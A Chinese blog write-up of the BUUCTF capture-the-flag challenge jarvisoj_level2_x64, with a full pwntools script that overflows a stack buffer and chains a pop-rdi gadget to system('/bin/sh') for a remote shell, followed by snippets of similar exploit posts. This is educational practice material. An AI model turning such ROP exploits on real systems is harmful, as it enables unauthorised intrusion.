【BUUCTF】jarvisoj_level2_x64 Write Up

最新推荐文章于 2024-11-30 09:33:43 发布
最新推荐文章于 2024-11-30 09:33:43 发布
阅读量697 收藏
点赞数
分类专栏: BUUCTF - PWN 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tqydyqt/article/details/107844902
版权



漏洞函数里面可以看到,我们可以栈溢出

题目使用了system函数,我们可以直接调用

程序里面藏了一个binsh

接下来只需要构造rop链了

64位的函数调用的第一个参数由rdi寄存器传递,很显然需要用到pop rdi这个gadget,并且几乎每个64位程序里面都能找到它

再需要注意的就是,system调用的时候需要栈对齐,这里采用一个ret来对齐栈

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('node3.buuoj.cn',26048)
#io=process('./level2_x64')
elf=ELF('./level2_x64')

ra()
sl('a'*0x88+p64(elf.search(asm('pop rdi\nret')).next())+p64(0x600a90)+p64(elf.search(asm('ret')).next())+p64(elf.plt['system']))

io.interactive()
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 566
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
BUUCTFjarvisoj_level3_x64write up
qq_44768749的博客
08-24 1004
BUUCTFjarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
[BUUCTF]PWN——jarvisoj_level2_x64
BangSen1的博客
03-30 1776
jarvisoj_level2_x64 例行检查 ,64位,开启NX保护, 运行一下 用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数,buf的长度为0x80,读取的长度为0x200,可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',
buuctf jarvisoj_level2_x64
carol2358的博客
04-22 428
水题 栈溢出,system和binsh都可以用gdb找到 exp: from pwn import * from LibcSearcher import * local_file = './level2_x64' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.so.6' s...
BUUCTF jarvisoj_level2
、moddemod
06-12 565
exp from pwn import * context(log_level = 'debug') proc_name = './level2' p = process(proc_name) # p = remote('node3.buuoj.cn', 26643) elf = ELF(proc_name) system_addr = elf.sym['system'] main_addr = elf.sym['main'] bin_sh_str = 0x0804a024 payload = 'a'..
[BUUCTF] jarvisoj_level2
Lucien_Carr的博客
04-14 553
读取文件指从某一个已打开地文件中,读取一定数量的字符,然后将这些读取的字符放入某一个预存的缓冲区内,供以后使用。有危险函数read,而且调用了system函数(但是缺少了“/bin/sh”参数)handle: 一个已经打开的文件句柄,表示从这个文件句柄所代表的文件读取数据。buffer: 指缓冲区,即读取的数据会被放到这个缓冲区中去。n: 表示调用一次read操作,应该读多少数量的字符。按“shift”+“F12”查看字符串,结果如下。进入文本视图查看system函数地址,如下图。
[BUUCTF-pwn]——jarvisoj_level2
Y_peak的博客
02-10 1305
[BUUCTF-pwn]——jarvisoj_level2 题目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下 exploit from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0
buuctf|pwn-jarvisoj_level2_x64-wp
l2645470582_的博客
11-08 515
1.例行检查保护机制 只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串,我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为:0x0600A90 3.查看main函数里面的内容 进入vulnerable_function()函数 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出 4.system("/bin/sh")才能拿到权限 我们找...
BUUCTFjarvisoj_level4(write up
qq_44768749的博客
08-24 1034
这里写目录标题0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、部分RELRO保护 0x02 运行 简单的输入一个字符串 0x03 IDA 漏洞点在vulnerable_function输入长度可以造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 第二次栈溢出跳转执行system("/bin/
BUUCTFjarvisoj_fm(write up
qq_44768749的博客
08-24 492
BUUCTFjarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、canary以及部分RELRO保护 0x02 运行 运行未发现什么异常,但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单,关键部分都在主函数中,有getshell的函数,当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3,需要利用格式化字符串漏洞改写x的值 测试格式
CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1483
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 713
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 552
[buuctf]jarvisoj_level2
[BUUCTF]PWN16——jarvisoj_level2
mcmuyanga的博客
09-01 2666
[BUUCTF]PWN16——jarvisoj_level2 附件 步骤 例行检查,32位,开启了nx保护 试运行一下程序 32位ida载入,shift+f12查看一下程序里的字符串,发现了system函数和 /bin/sh 字符串 双击跟进,ctrl+x本想查看调用该字符串的函数的,没有找到,但是程序里有这些字符串的位置, shell_addr=0x804a024 system_addr=0x8048320 我们可以直接利用这些构造 system(/bin/sh)去执行 跟进试运行时候看到的字
buuctfjarvisoj_level2
weixin_54452942的博客
04-11 716
buuctf--pwn
BUUCTF - PWN】jarvisoj_level2
古月浪子的博客
04-05 724
checksec一下,栈溢出 IDA打开看看,很容易找到溢出点,/bin/sh字符串程序里也有现成的 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) ru=lamb...
BUUCTF pwn——jarvisoj_level2_x64
CNS-Enterprise BCC-1701-J
04-03 328
BUUCTF 做题练习
jarvisoj_level2BUUCTF
qq_41696518的博客
08-26 885
jarvisoj_level2BUUCTF
BUUCTFjarvisoj_level2
最新发布
2201_75556700的博客
11-30 245
1、在kali中分析文件,该文件为32位文件,有NX保护。6、shift+f12查看调用了哪些函数,发现了后门函数。8、在segements中查看调用system函数的地址。3、使用32位的ida分析,这里调用了两个函数。4、双击第一个函数,存在栈溢出。5、查看buf数组的栈结构。
jarvisoj_level2
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这个题目的解题思路的说明。 具体来说,在这个题目中,程序调用了system函数,并且存在/bin/sh字符串。通过对return address进行覆盖,可以将程序的控制流引导到system函数,并将/bin/sh字符串作为参数传递给它,从而获取Shell。其中,payload中的一些关键地址和字符串的具体值需要根据具体题目的情况来确定。 需要注意的是,这个题目的具体实现可能与上述引用中的代码有所不同,因此需要根据实际情况进行调整。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [jarvisoj_level2_x64](https://blog.youkuaiyun.com/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [jarvisoj_level2](https://blog.youkuaiyun.com/m0_55086916/article/details/128089924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值